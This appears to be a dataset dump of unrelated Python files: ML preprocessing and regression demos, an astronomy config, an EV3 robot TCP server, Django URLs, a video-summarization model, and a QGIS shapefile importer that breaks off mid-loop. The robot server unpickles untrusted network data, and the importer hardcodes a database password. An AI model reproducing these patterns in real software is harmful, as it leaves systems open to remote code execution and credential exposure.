text stringlengths 38 1.54M |
|---|
# Data Preprocessing Template
# Importing the libraries
# Contains mathematical tools
import numpy as np
# Helps us plot nice charts
import matplotlib.pyplot as plt
# Best library for importing and managing data sets
import pandas as pd

# Importing the dataset
dataset = pd.read_csv('Data.csv')
# Matrix of features: every column except the last
X = dataset.iloc[:, :-1].values
# Dependent variable vector: the last column
y = dataset.iloc[:, 3].values

# Taking care of missing data.
# Fix: sklearn.preprocessing.Imputer was removed in scikit-learn 0.22;
# SimpleImputer is the replacement ('mean' is still the default strategy,
# and it always works column-wise, which is what axis=0 meant).
from sklearn.impute import SimpleImputer
imputer = SimpleImputer(missing_values=np.nan, strategy='mean')
# Columns 1 and 2 only -- the upper bound of the slice is excluded
X[:, 1:3] = imputer.fit_transform(X[:, 1:3])

# Encoding categorical data.
# Fix: OneHotEncoder(categorical_features=[0]) was removed; a
# ColumnTransformer now selects which column to one-hot encode, and
# 'passthrough' keeps the remaining columns (encoded columns come first,
# matching the old output layout).
from sklearn.preprocessing import LabelEncoder, OneHotEncoder
from sklearn.compose import ColumnTransformer
ct = ColumnTransformer([('encoder', OneHotEncoder(), [0])],
                       remainder='passthrough')
X = np.array(ct.fit_transform(X), dtype=float)
# The dependent variable only needs label encoding, not one-hot encoding
labelencoder_y = LabelEncoder()
y = labelencoder_y.fit_transform(y)

# Splitting the dataset into the Training Set and Test Set.
# Fix: sklearn.cross_validation was removed in 0.20; use model_selection.
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)
|
# Config file for tests/measure.py; previously tests/MeasureSources.paf.
# 'root' should be an instance of lsst.meas.algorithms.SourceMeasurementConfig (defined in measurement.py)
# Slot mappings: which algorithm's output fills each standard measurement slot
root.slots.centroid = "centroid.naive"
root.slots.apFlux = "flux.naive"
root.slots.modelFlux = "flux.gaussian"
root.slots.psfFlux = "flux.psf"
root.slots.shape = "shape.sdss"
# Per-algorithm tuning parameters (radii in pixels)
root.algorithms["flux.naive"].radius = 3.0
root.algorithms["flux.gaussian"].shiftmax = 10.0
root.algorithms["flux.sinc"].radius = 3.0
# The full set of measurement algorithms to run
root.algorithms.names = ["flags.pixel",
                         "centroid.gaussian", "centroid.naive",
                         "shape.sdss",
                         "flux.naive", "flux.gaussian", "flux.psf", "flux.sinc",
                         "classification.extendedness"]
# Algorithm used for the initial centroid estimate
root.centroider.name = "centroid.sdss"
|
import numpy as np
# Build a synthetic data set for y = 3*x + 2 (second column is the bias term).
sample_count = 100
X = np.linspace(0, 100, sample_count)
X = np.c_[X, np.ones(sample_count)]
w = np.asarray([3, 2])
Y = X.dot(w)
X = X.astype('float')
Y = Y.astype('float')
# Perturb the feature column with Gaussian noise.
X[:, 0] += np.random.normal(size=(X[:, 0].shape)) * 3
Y = Y.reshape(sample_count, 1)
from ml_models.linear_model import LinearRegression
import matplotlib.pyplot as plt
# Fit an SGD-based linear regression on the noisy feature column.
lr = LinearRegression(solver='sgd')
lr.fit(X[:, :-1], Y)
predict = lr.predict(X[:, :-1])
# Inspect the learned weights.
print('w', lr.get_params())
# Standard deviation of the residuals.
print(np.std(Y - predict))
lr.plot_fit_boundary(X[:, :-1], Y)
plt.show()
|
#!/usr/bin/env python3
# EV3 line-following delivery robot: receives direction queues from a server
# over TCP and drives a black/white road network with yellow nodes.
from ev3dev.ev3 import *
from time import sleep
from random import choice
import pickle
import socket as socket_library
# Listen on all interfaces on port 9999
HOST = ""
PORT = 9999
# Proportional gain used by exit_node's reflected-light line follower
LEGO_SLOPE = 3.6
# Operating modes sent by the server as the last element of each queue
QUEUE_CONTROL = 0
MANUAL_CONTROL = 1
A_STAR = 2
CELEBRATE = 3
OFF = 0
ON = 1
# Indices of the motor on/off flags inside a MANUAL_CONTROL message
LEFT_MOTOR = 0
RIGHT_MOTOR = 1
# Messages sent to the server for handling
# NOTE(review): pickle protocol 0 keeps the payload ASCII-compatible
ACCEPT_MSG = pickle.dumps("Directions accepted.", protocol = 0)
DECLINE_MSG = pickle.dumps("Directions invalid", protocol = 0)
SUCCESS_MSG = pickle.dumps("Directions completed.", protocol = 0)
FAILURE_MSG = pickle.dumps("Direction completion failed.", protocol = 0)
# Constants for colors that should be recognized by the program
# (numeric codes produced by the color sensor in COL-COLOR mode)
UNKNOWN = 0
BLACK = 1
YELLOW = 4
WHITE = 6
COLORS = [UNKNOWN, BLACK, YELLOW, WHITE]
# How many sensor readings should be stored to check for errors
COLOR_MEMORY_LENGTH = 10
# IR proximity threshold, in sensor percent units (100% is roughly 70 cm)
MIN_DISTANCE = 50
# Percentages used to control how the robot reacts to changes in color
# calculated by dividing amount of a color by the color memory length
# Road threshold determines how many times the robot can detect a color besides black, white, and yellow before shutting off
# The feature is currently unused (the threshold is set at greater than 100%)
ROAD_THRESHOLD = 1.1
# Node threshold determines how many times the robot needs to see yellow before reacting to the node
NODE_THRESHOLD = 0.3
# Constants used to store turning directions
# Switch to numbers? Used to cause issues, need to check if still issue
LEFT = "left"
RIGHT = "right"
STRAIGHT = "straight"
REVERSE = "reverse"
# Integer value between 0 and 1000 that limits the speed of the motors.
MAX_SPEED = 360
# Float value that is used to keep track of how far off track the robot is when exiting a node.
error = 0
# Float value that determines how severely the robot reacts to being in the wrong location while following the road.
adjustment = 0.1
# Float value that is muliplied by the robot's max speed to slow down the robot during turns to increase accuracy.
turn_speed_reduction = 0.2
# Boolean value (1 or -1) that decides whether the robot should expect black to be on the left or right side of the robot's center.
# 1 is equivalent to black on the left, -1 is equivalent to black on the right
black_side = 1
# Counter used to keep track of how long the robot has been waiting on an obstacle to move
obstacle_detected_counter = 0
# How many times the robot will wait for an obstacle to move
obstacle_wait_timeout = 2
# A list of empty strings which is later used to keep track of past color sensor readings which are used for error tracking
past_colors = []
for i in range(COLOR_MEMORY_LENGTH):
    past_colors.append("")
# Used as a killswitch while the robot is running
btn = Button()
# Initializes color sensor and ensures it is connected.
cl = ColorSensor()
assert cl.connected, "Connect color sensor."
# Initializes infrared sensor and ensures it is connected.
ir = InfraredSensor()
assert ir.connected, "Connect IR sensor."
# Initializes touch sensor and ensures it is connected.
ts = TouchSensor()
assert ts.connected, "Connect touch sensor."
# Initializes left and right motors and ensures they are connected.
l_motor = LargeMotor(OUTPUT_B)
assert l_motor.connected, "Connect left motor to port B."
r_motor = LargeMotor(OUTPUT_C)
assert r_motor.connected, "Connect right motor to port C."
# Sets color sensor to return an integer value representative of the color its seeing.
cl.mode = "COL-COLOR"
# Sets infrared sensor to measure proximity on a scale of 0% - 100%.
# 0% is equivalent to 0 cm and 100% is approximately 70 cm.
ir.mode = "IR-PROX"
# Creates a socket object used to connect to the server
# (the stdlib module was imported as socket_library so this name is free)
socket = socket_library.socket(socket_library.AF_INET, socket_library.SOCK_STREAM)
# Starts both drive motors; they keep running until explicitly stopped,
# so speed changes only require updating speed_sp and calling this again.
def run_motors():
    """Start (or keep) both drive motors running at their current speed_sp."""
    for motor in (l_motor, r_motor):
        motor.run_forever()
# Brings the robot to an immediate halt.
def stop_motors():
    """Zero both motor speed setpoints, then stop both motors in 'hold' mode."""
    for motor in (l_motor, r_motor):
        motor.speed_sp = 0
    l_motor.stop(stop_action = "hold")
    r_motor.stop(stop_action = "hold")
# Records the newest color reading and summarizes the recent history,
# which the main loop uses to decide whether the robot is on a road,
# at a node, or lost.
def detect_color():
    """Return (unknown, black, yellow, white) fractions of recent readings."""
    global COLORS
    global past_colors
    # Slide the history window: drop the oldest reading, append the newest.
    reading = cl.value()
    past_colors.pop(0)
    past_colors.append(reading)
    window = len(past_colors)
    return tuple(past_colors.count(color) / window
                 for color in (UNKNOWN, BLACK, YELLOW, WHITE))
# Proportional line follower using LEGO's predefined color codes:
# steers toward the black/white boundary by skewing the motor speeds.
def follow_road():
    """Nudge the motor speeds so the robot tracks the road edge."""
    global error
    global black_side
    color = cl.value()
    # Seeing pure black or pure white means the robot drifted off the edge.
    if color == BLACK:
        error -= adjustment
    elif color == WHITE:
        error += adjustment
    # Keep the accumulated error inside [-0.15, 0.15].
    error = max(-0.15, min(0.15, error))
    # Apply an equal-and-opposite correction to the two wheels.
    correction = MAX_SPEED * error * black_side
    left_speed = MAX_SPEED - correction
    right_speed = MAX_SPEED + correction
    # Clamp both speeds to the motor's allowed range.
    left_speed = max(-MAX_SPEED, min(MAX_SPEED, left_speed))
    right_speed = max(-MAX_SPEED, min(MAX_SPEED, right_speed))
    l_motor.speed_sp = left_speed
    r_motor.speed_sp = right_speed
    run_motors()
# Stops and asks for help when something blocks the driving path, either
# seen ahead by the IR sensor or already touching the bumper.
def check_for_obstacles():
    """Pause and complain when an obstacle blocks the driving path.

    Increments the global obstacle counter on every detection so callers can
    time out after obstacle_wait_timeout attempts; resets the counter as soon
    as the path is clear.
    """
    global obstacle_detected_counter
    # Fix: the IR and touch branches had byte-identical bodies; merged with a
    # short-circuit `or`, so ts.value() is still only read when the IR
    # reading is clear (same evaluation order as before).
    if ir.value() < MIN_DISTANCE or ts.value():
        stop_motors()
        obstacle_detected_counter += 1
        Sound.speak("Please move the obstacle out of my driving path. Thank you.").wait()
        sleep(10)
    else:
        obstacle_detected_counter = 0
# Handles arrival at a yellow node: turn as requested, update orientation
# bookkeeping, drive out of the node, and clear stale sensor history.
def handle_node(turn_direction):
    """Execute the queued turn at a node and leave it ready to follow road."""
    global past_colors
    global black_side
    stop_motors()
    # Only physically turn when the robot is not driving straight through.
    if turn_direction != STRAIGHT:
        turn(turn_direction)
    # Going straight or reversing swaps which side black is expected on.
    if turn_direction in (STRAIGHT, REVERSE):
        black_side *= -1
    exit_node()
    # Wipe the color history so node readings don't immediately re-trigger.
    past_colors = [""] * COLOR_MEMORY_LENGTH
# Called when the robot is prevented from reaching its destination
def handle_failure():
    # Report the failure to the server, tear the connection down cleanly,
    # and terminate the program. The order matters: sendall before shutdown,
    # shutdown before close.
    stop_motors()
    socket_connection.sendall(FAILURE_MSG)
    socket_connection.shutdown(socket_library.SHUT_RDWR)
    socket_connection.close()
    # Brief pause so the message is flushed before the process exits.
    sleep(3)
    exit()
# No longer used; returns a random direction from the set of possible turns.
def get_directions():
    """Return a random turn direction, flipping black_side for straights.

    Fix: the original referenced an undefined global DIRECTIONS, which made
    any call raise NameError; the candidate list is now defined locally from
    the module's direction constants.
    """
    global black_side
    directions = [LEFT, RIGHT, STRAIGHT, REVERSE]
    turn_direction = choice(directions)
    # Going straight through a node swaps the expected side of the black line.
    if turn_direction == STRAIGHT:
        black_side *= -1
    return(turn_direction)
# Ensures the robot can turn in any direction and end up where expected
def turn(turn_direction):
    """Pivot at a node until the color sensor confirms the turn is complete.

    LEFT/RIGHT pivot on a single motor; REVERSE spins in place. Turns that
    cross the road line run in two phases: drive until black is first seen
    (half_turn_complete), then keep going until white reappears. Aborts via
    handle_failure() when an obstacle blocks the turn for too long.
    """
    global black_side
    # becomes true when a specific waypoint during the turn has been detected
    half_turn_complete = False
    # becomes true when the turn has been completed
    turn_complete = False
    # updates the reading from the color sensor
    current_color = cl.value()
    while not turn_complete:
        global obstacle_detected_counter
        check_for_obstacles()
        if obstacle_detected_counter > obstacle_wait_timeout:
            handle_failure()
        elif obstacle_detected_counter == 0:
            # if black is on the left
            if black_side == 1:
                if turn_direction == LEFT:
                    # single-phase: pivot on the right motor until black
                    if current_color != BLACK:
                        r_motor.speed_sp = MAX_SPEED * turn_speed_reduction
                    else:
                        turn_complete = True
                elif turn_direction == RIGHT:
                    # two-phase: cross to black, then continue to white
                    if half_turn_complete != True:
                        if current_color != BLACK:
                            l_motor.speed_sp = MAX_SPEED * turn_speed_reduction
                        else:
                            half_turn_complete = True
                    elif current_color != WHITE:
                        l_motor.speed_sp = MAX_SPEED * turn_speed_reduction
                    else:
                        turn_complete = True
                elif turn_direction == REVERSE:
                    # spin in place (motors counter-rotating), two phases
                    if half_turn_complete != True:
                        if current_color != BLACK:
                            l_motor.speed_sp = -MAX_SPEED * turn_speed_reduction
                            r_motor.speed_sp = MAX_SPEED * turn_speed_reduction
                        else:
                            half_turn_complete = True
                    elif current_color != WHITE:
                        l_motor.speed_sp = -MAX_SPEED * turn_speed_reduction
                        r_motor.speed_sp = MAX_SPEED * turn_speed_reduction
                    else:
                        turn_complete = True
            # if black is on the right (mirror image of the cases above)
            elif black_side == -1:
                if turn_direction == LEFT:
                    if half_turn_complete != True:
                        if current_color != BLACK:
                            r_motor.speed_sp = MAX_SPEED * turn_speed_reduction
                        else:
                            half_turn_complete = True
                    elif current_color != WHITE:
                        r_motor.speed_sp = MAX_SPEED * turn_speed_reduction
                    else:
                        turn_complete = True
                elif turn_direction == RIGHT:
                    if current_color != BLACK:
                        l_motor.speed_sp = MAX_SPEED * turn_speed_reduction
                    else:
                        turn_complete = True
                elif turn_direction == REVERSE:
                    if half_turn_complete != True:
                        if current_color != BLACK:
                            l_motor.speed_sp = MAX_SPEED * turn_speed_reduction
                            r_motor.speed_sp = -MAX_SPEED * turn_speed_reduction
                        else:
                            half_turn_complete = True
                    elif current_color != WHITE:
                        l_motor.speed_sp = MAX_SPEED * turn_speed_reduction
                        r_motor.speed_sp = -MAX_SPEED * turn_speed_reduction
                    else:
                        turn_complete = True
        # runs the motors at the new speeds
        run_motors()
        # updates the reading from the color sensor
        current_color = cl.value()
    stop_motors()
# Drives the robot out of a node and back onto the road edge.
# Only works on black/white roads: it aims for a reflected-light value that
# occurs exactly at the black/white boundary.
def exit_node():
    """Follow the black/white boundary for a fixed number of steps."""
    target_reflection = 35
    # Temporarily switch the sensor to reflected-light mode.
    cl.mode = "COL-REFLECT"
    for _ in range(300):
        deviation = target_reflection - cl.value()
        gain = LEGO_SLOPE * deviation * black_side
        # Opposite corrections on the two wheels, capped at MAX_SPEED.
        left_speed = min(MAX_SPEED, MAX_SPEED + gain)
        right_speed = min(MAX_SPEED, MAX_SPEED - gain)
        l_motor.speed_sp = left_speed
        r_motor.speed_sp = right_speed
        run_motors()
    stop_motors()
    # Restore color-code mode for the rest of the program.
    cl.mode = "COL-COLOR"
# --- Main server loop: accept a single client and execute its queues ---
socket.setsockopt(socket_library.SOL_SOCKET, socket_library.SO_REUSEADDR, 1)
socket.bind((HOST, PORT))
socket.listen(1)
socket_connection, client_ip = socket.accept()
print("Connected to ", client_ip)
while True:
    ser_direction_queue = socket_connection.recv(1024)
    # Error checking needs to happen between here...
    # SECURITY(review): pickle.loads on raw network bytes can execute
    # arbitrary code -- only run this on a trusted network.
    direction_queue = pickle.loads(ser_direction_queue)
    # The last element of the queue is the mode; the rest are directions.
    direction_queue_length = len(direction_queue) - 1
    # ...and here
    socket_connection.sendall(ACCEPT_MSG)
    mode = direction_queue[direction_queue_length]
    if mode == QUEUE_CONTROL:
        # killswitch
        if btn.any():
            exit()
        else:
            # Follow the road between nodes, turning at each node as queued.
            for i in range(direction_queue_length):
                turn_direction = direction_queue[i]
                while True:
                    color_percents = detect_color()
                    if (color_percents[0] < ROAD_THRESHOLD) and (color_percents[2] < NODE_THRESHOLD):
                        follow_road()
                    elif color_percents[2] >= NODE_THRESHOLD:
                        handle_node(turn_direction)
                        break
                    else:
                        handle_failure()
                        break
    elif mode == MANUAL_CONTROL:
        # killswitch
        if btn.any():
            exit()
        else:
            # Pulse each motor for 100 ms according to the ON/OFF flags.
            l_motor.speed_sp = MAX_SPEED
            r_motor.speed_sp = MAX_SPEED
            if direction_queue[LEFT_MOTOR] == ON:
                l_motor.run_timed(time_sp = 100)
            else:
                l_motor.stop(stop_action = "hold")
            if direction_queue[RIGHT_MOTOR] == ON:
                r_motor.run_timed(time_sp = 100)
            else:
                r_motor.stop(stop_action = "hold")
    elif mode == A_STAR:
        # One extra iteration so the robot stops on the destination node.
        for i in range(direction_queue_length + 1):
            if i < direction_queue_length:
                turn_direction = direction_queue[i]
            while True:
                check_for_obstacles()
                # killswitch
                if btn.any():
                    handle_failure()
                # has the robot already waited on an obstacle to move?
                elif obstacle_detected_counter > obstacle_wait_timeout:
                    Sound.speak("Obstacle has not moved. Exiting.")
                    handle_failure()
                # normal operations
                elif obstacle_detected_counter == 0:
                    color_percents = detect_color()
                    if (color_percents[0] < ROAD_THRESHOLD) and (color_percents[2] < NODE_THRESHOLD):
                        follow_road()
                    elif color_percents[2] >= NODE_THRESHOLD:
                        if i < direction_queue_length:
                            handle_node(turn_direction)
                            stop_motors()
                            break
                        else:
                            # Destination node reached: stop without turning.
                            stop_motors()
                            break
                    else:
                        handle_failure()
        socket_connection.sendall(SUCCESS_MSG)
    elif mode == CELEBRATE:
        Sound.speak("Arrived at destination.").wait()
        sleep(5)
        Sound.speak("Returning home.").wait()
        socket_connection.sendall(SUCCESS_MSG)
    else:
        print("INVALID MODE")
        print("Exiting program")
        break
# Stops the robot and notifies the user with a beep.
stop_motors()
Sound.beep()
# Python default function which ensures the program ends correctly
exit()
|
# NOTE(review): django.conf.urls.defaults was removed in Django 1.6 and the
# patterns() helper in Django 1.10 -- this module targets a legacy release
# and must not be "modernized" without upgrading the whole project.
from django.conf.urls.defaults import patterns, include
# Built-in auth views rendered with project-specific templates.
urlpatterns = patterns('django.contrib.auth.views',
    (r'^accounts/login/$', 'login', {'template_name': 'ui/login.html'}),
    (r'^accounts/logout/$', 'logout', {'template_name': 'ui/logout.html'}),
)
# General UI views plus the install/config/upgrade sub-URLconfs.
urlpatterns += patterns('geppetto.ui.views.general',
    ('^$', 'root', {}, 'root'),
    ('^unassigned_workers_list$', 'unassigned_workers_list', {},
        'unassigned_workers_list'),
    (r'^', include('geppetto.ui.views.install.urls')),
    (r'^', include('geppetto.ui.views.config.urls')),
    (r'^', include('geppetto.ui.views.upgrade.urls')),
    # Catch-all: any lowercase page name is rendered by the 'common' view.
    (r'^(?P<page_name>[a-z_]+)$', 'common', {}, 'common')
)
|
# -*- coding: utf-8 -*-
"""
Created on Wed Nov 8 17:33:23 2017
@author: jagan
"""
#*arg(Simple Argument) & **kwarg(Keyword Argument)
#* - Non Keyword variables ; args is idiom and not enforced
def normal_function(var1, var2):
    """Print both positional arguments with their parameter names."""
    for label, value in (("var1", var1), ("var2", var2)):
        print(label + ":", value)
def normal_funtion_one_var(var1, *arg):
    """Print the first argument, then every extra positional argument."""
    print("var1:", var1)
    leftovers = list(arg)
    while leftovers:
        print("Rest of the data:", leftovers.pop(0))
def normal_funtion_two_var(var1, var2, *arg):
    """Print the two named arguments, then every extra positional argument."""
    print("var1:", var1)
    print("var2:", var2)
    leftovers = list(arg)
    while leftovers:
        print("Rest of the data:", leftovers.pop(0))
def normal_funtion_arg_only(*arg):
    """Print every positional argument on its own line."""
    for value in arg:
        print("Rest of the data:", value)
# Example invocations -- the first three are left disabled:
#normal_function('hello','python')
#normal_funtion_one_var('hello','python','jagan','iot','mobile','ML')
#normal_funtion_two_var('hello','python','jagan','iot','mobile','ML')
normal_funtion_arg_only('hello','python','jagan','iot','mobile','ML')
# Part of the implementation is borrowed and modified from BMT and video_features,
# publicly available at https://github.com/v-iashin/BMT
# and https://github.com/v-iashin/video_features
import argparse
import os
import os.path as osp
from copy import deepcopy
from typing import Dict, Union
import numpy as np
import torch
import torch.nn as nn
from bmt_clipit.sample.single_video_prediction import (caption_proposals,
generate_proposals,
load_cap_model,
load_prop_model)
from bmt_clipit.utilities.proposal_utils import non_max_suppresion
from torch.nn.parallel import DataParallel, DistributedDataParallel
from videofeatures_clipit.models.i3d.extract_i3d import ExtractI3D
from videofeatures_clipit.models.vggish.extract_vggish import ExtractVGGish
from videofeatures_clipit.utils.utils import (fix_tensorflow_gpu_allocation,
form_list_from_user_input)
from modelscope.metainfo import Models
from modelscope.models.base import Tensor, TorchModel
from modelscope.models.builder import MODELS
from modelscope.models.cv.language_guided_video_summarization.transformer import \
Transformer
from modelscope.utils.constant import ModelFile, Tasks
from modelscope.utils.logger import get_logger
logger = get_logger()
def extract_text(args):
    """Generate event proposals for a video and caption each one.

    Args:
        args: namespace carrying device_id, features, duration_in_secs,
            pretrained_cap_model_path, prop_generator_model_path,
            max_prop_per_vid and nms_tiou_thresh.

    Returns:
        Captions for the (optionally NMS-filtered) proposals.
    """
    # Loading models and other essential stuff
    cap_cfg, cap_model, train_dataset = load_cap_model(
        args.pretrained_cap_model_path, args.device_id)
    prop_cfg, prop_model = load_prop_model(args.device_id,
                                           args.prop_generator_model_path,
                                           args.pretrained_cap_model_path,
                                           args.max_prop_per_vid)
    # Proposal generation
    proposals = generate_proposals(prop_model, args.features,
                                   train_dataset.pad_idx, prop_cfg,
                                   args.device_id, args.duration_in_secs)
    # Drop overlapping proposals when an NMS threshold is configured
    if args.nms_tiou_thresh is not None:
        proposals = non_max_suppresion(proposals.squeeze(),
                                       args.nms_tiou_thresh)
        proposals = proposals.unsqueeze(0)
    # Captions for each proposal
    captions = caption_proposals(cap_model, args.features, train_dataset,
                                 cap_cfg, args.device_id, proposals,
                                 args.duration_in_secs)
    return captions
def extract_video_features(video_path, tmp_path, feature_type, i3d_flow_path,
                           i3d_rgb_path, kinetics_class_labels, pwc_path,
                           vggish_model_path, vggish_pca_path, extraction_fps,
                           device):
    """Extract visual (I3D) or audio (VGGish) features from a video.

    Args:
        video_path: path to the input video file.
        tmp_path: working directory for intermediate files.
        feature_type: 'i3d' or 'vggish' -- selects the extractor.
        i3d_flow_path, i3d_rgb_path: I3D checkpoint paths.
        kinetics_class_labels: Kinetics label file (I3D only).
        pwc_path: PWC-Net checkpoint used for optical flow (I3D only).
        vggish_model_path, vggish_pca_path: VGGish checkpoint paths.
        extraction_fps: frame rate at which frames are sampled.
        device: device passed through to the extractor.

    Returns:
        The features produced by the selected extractor.

    Raises:
        ValueError: if `feature_type` is not supported. (Fix: the original
            fell through both branches and crashed with an unrelated
            NameError on `extractor`.)
    """
    default_args = dict(
        device=device,
        extraction_fps=extraction_fps,
        feature_type=feature_type,
        file_with_video_paths=None,
        i3d_flow_path=i3d_flow_path,
        i3d_rgb_path=i3d_rgb_path,
        keep_frames=False,
        kinetics_class_labels=kinetics_class_labels,
        min_side_size=256,
        pwc_path=pwc_path,
        show_kinetics_pred=False,
        stack_size=64,
        step_size=64,
        tmp_path=tmp_path,
        vggish_model_path=vggish_model_path,
        vggish_pca_path=vggish_pca_path,
    )
    args = argparse.Namespace(**default_args)
    if args.feature_type == 'i3d':
        extractor = ExtractI3D(args)
    elif args.feature_type == 'vggish':
        extractor = ExtractVGGish(args)
    else:
        # Fail fast with a clear message instead of NameError on 'extractor'.
        raise ValueError(
            "unsupported feature_type: {!r} (expected 'i3d' or 'vggish')".format(
                feature_type))
    feats = extractor(video_path)
    return feats
def video_features_to_txt(duration_in_secs, pretrained_cap_model_path,
                          prop_generator_model_path, features, device_id):
    """Run proposal generation plus captioning and return the caption text.

    max_prop_per_vid and nms_tiou_thresh are fixed at 100 and 0.4, the values
    used throughout this pipeline.
    """
    args = argparse.Namespace(
        device_id=device_id,
        duration_in_secs=duration_in_secs,
        features=features,
        pretrained_cap_model_path=pretrained_cap_model_path,
        prop_generator_model_path=prop_generator_model_path,
        max_prop_per_vid=100,
        nms_tiou_thresh=0.4,
    )
    return extract_text(args)
@MODELS.register_module(
    Tasks.language_guided_video_summarization,
    module_name=Models.language_guided_video_summarization)
class ClipItVideoSummarization(TorchModel):
    """Language-guided video summarization model that scores video frames
    conditioned on text features via a Transformer."""

    def __init__(self, model_dir: str, *args, **kwargs):
        """initialize the video summarization model from the `model_dir` path.
        Args:
            model_dir (str): the model path.
        """
        super().__init__(model_dir, *args, **kwargs)
        model_path = osp.join(model_dir, ModelFile.TORCH_MODEL_FILE)
        # MSE between predicted frame scores and ground-truth scores.
        self.loss = nn.MSELoss()
        self.model = Transformer()
        # Prefer GPU when one is available.
        if torch.cuda.is_available():
            self._device = torch.device('cuda')
        else:
            self._device = torch.device('cpu')
        self.model = self.model.to(self._device)
        self.model = self.load_pretrained(self.model, model_path)
        # Keep the wrapped transformer's mode in sync with this module.
        if self.training:
            self.model.train()
        else:
            self.model.eval()

    def load_pretrained(self, net, load_path, strict=True, param_key='params'):
        """Load pretrained weights from `load_path` into `net`.

        Args:
            net: target module; a (Distributed)DataParallel wrapper is unwrapped.
            load_path (str): checkpoint file path.
            strict (bool): passed through to `load_state_dict`.
            param_key (str): key of the state dict inside the checkpoint;
                falls back to 'params' when the given key is absent.

        Returns:
            The module with the loaded weights.
        """
        if isinstance(net, (DataParallel, DistributedDataParallel)):
            net = net.module
        # Load onto CPU; the caller moves the module to the right device.
        load_net = torch.load(
            load_path, map_location=lambda storage, loc: storage)
        if param_key is not None:
            if param_key not in load_net and 'params' in load_net:
                param_key = 'params'
                logger.info(
                    f'Loading: {param_key} does not exist, use params.')
            if param_key in load_net:
                load_net = load_net[param_key]
        logger.info(
            f'Loading {net.__class__.__name__} model from {load_path}, with param key: [{param_key}].'
        )
        # remove unnecessary 'module.' prefixes left over from DataParallel
        for k, v in deepcopy(load_net).items():
            if k.startswith('module.'):
                load_net[k[7:]] = v
                load_net.pop(k)
        net.load_state_dict(load_net, strict=strict)
        logger.info('load model done.')
        return net

    def _train_forward(self, input: Dict[str, Tensor]) -> Dict[str, Tensor]:
        """Training step: MSE loss between predicted and ground-truth scores."""
        frame_features = input['frame_features']
        txt_features = input['txt_features']
        gtscore = input['gtscore']
        preds, attn_weights = self.model(frame_features, txt_features,
                                         frame_features)
        return {'loss': self.loss(preds, gtscore)}

    def _inference_forward(self, input: Dict[str,
                                             Tensor]) -> Dict[str, Tensor]:
        """Inference step: predicted per-frame importance scores."""
        frame_features = input['frame_features']
        txt_features = input['txt_features']
        y, dec_output = self.model(frame_features, txt_features,
                                   frame_features)
        return {'scores': y}

    def forward(self, input: Dict[str,
                                  Tensor]) -> Dict[str, Union[list, Tensor]]:
        """return the result by the model
        Args:
            input (Dict[str, Tensor]): the preprocessed data
        Returns:
            Dict[str, Union[list, Tensor]]: results
        """
        # Move every input tensor to the model's device before dispatching.
        for key, value in input.items():
            input[key] = input[key].to(self._device)
        if self.training:
            return self._train_forward(input)
        else:
            return self._inference_forward(input)
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import sys
from qgis.core import *
import subprocess # pour utiliser subprocess.call()
import time
from PyQt4.Qt import *
def CreateFile(self):
    """Create an empty file at the given path, truncating any existing file.

    Note: `self` is the file path (legacy parameter name kept so existing
    positional callers keep working).
    """
    # 'with' guarantees the handle is closed even if something goes wrong.
    with open(self, "w"):
        pass
def WriteFile(self, texte):
    """Append `texte` plus a trailing newline to the file at path `self`.

    Note: `self` is the file path (legacy parameter name kept so existing
    positional callers keep working).
    """
    # 'with' guarantees the handle is closed even if write() raises.
    with open(self, 'a') as handle:
        handle.write(texte + '\n')
"""##########################"""
""" variables a modifier """
""" Config Postgis """
url='localhost'
db='mug'
port = 5432
login='postgres'
mdp='amaury'
repertoire=r"D:\00_Corbeille\keolis"
shem='bati'
""" variables a modifier si utilise sur windows
Chemin d'acces a postgis et qgis """
pathpg = r"C:\Program Files\PostgreSQL\9.4\bin"
pathAppsQgis = r"C:\Program Files\QGIS Lyon\apps\qgis"
"""##########################"""
# indication du repertoire contenant l'installation de qgis
if sys.platform == 'win32':
QgsApplication.setPrefixPath(pathAppsQgis, True)
elif sys.platform == 'linux2':
app = QApplication(sys.argv)
QgsApplication.setPrefixPath('/usr', True)
""" Initialisation de QGIS """
#RAS faut l'initialiser pour que le script soit autonome, mais o peux le virer sans probleme a priori
QgsApplication.initQgis()
""" creation du fichier texte """
# recup dans une variable du jour_mois_annee
date = time.strftime("%d_%m_%Y", time.localtime())
# on ecrit dans le repertoire ou se trouve les donnees source un fichier txt qui va resumer les caracteristiques des fichiers
FichierTxt='%s/resume_%s.txt' % (repertoire,date)
CreateFile(FichierTxt)
# on affecte aux variable d'environnement les valeurs suivantes
os.environ['PGHOST'] = url
os.environ['PGPORT'] = str(port)
os.environ['PGUSER'] = login
os.environ['PGPASSWORD'] = mdp
os.environ['PGDATABASE'] = db
#on recupere dans une variable le repertoire defini plus haut ! inutile en effet :p
base_dir = repertoire
# Walk the data directory recursively; os.walk yields one
# (directory, subdirectories, files) triple per visited directory.
full_dir = os.walk(base_dir)
# Collect the full path of every shapefile found in the tree.
shapefile_list = []
for source, dirs, files in full_dir:
    for file_ in files:
        # Keep only ESRI shapefiles. Fix: endswith('.shp') instead of a bare
        # 3-character suffix check, which also matched names like 'fooshp'.
        if file_.endswith('.shp'):
            # Fix: join against the directory actually being walked
            # ('source'), not base_dir -- the old code produced wrong paths
            # for any shapefile living in a subdirectory.
            shapefile_path = os.path.join(source, file_)
            shapefile_list.append(shapefile_path)
# Process every shapefile collected above.
for shape_path in shapefile_list:
    # On Windows, read the shapefile encoding through the PyQGIS provider.
    if sys.platform == 'win32':
        # Load the layer from its path; "tmp" is the layer name (may be
        # anything), "ogr" is the driver.
        vct = QgsVectorLayer(shape_path, "tmp", "ogr" )
        # The data provider exposes the encoding value.
        provider = vct.dataProvider()
        encoding = provider.encoding()
    # On Linux, read the .cpg side-car file instead -- PyQGIS is unreliable
    # there according to the original author.
    elif sys.platform == 'linux2':
        # Same base name as the .shp, with the extension swapped for cpg.
        cpgFile = r'%scpg' % shape_path[:-3]
        # Try to open the cpg file and read the encoding it declares.
        try:
            with open(cpgFile) as f:
                # One list entry per line of the file.
                encoding = f.readlines()
                # Only the first line matters.
                encoding = encoding[0]
        # Missing cpg file -> the encoding is unknown.
        except IOError:
            encoding = None
    # Only UTF-8 encoded shapefiles are imported.
    if encoding == 'UTF-8' or encoding == 'utf-8':
        provider_name = "ogr"
        # File metadata for the shapefile.
        fileInfo = QFileInfo(shape_path)
        # Load the layer (path + display name + ogr provider).
        layer = QgsVectorLayer(shape_path, fileInfo.fileName(), provider_name)
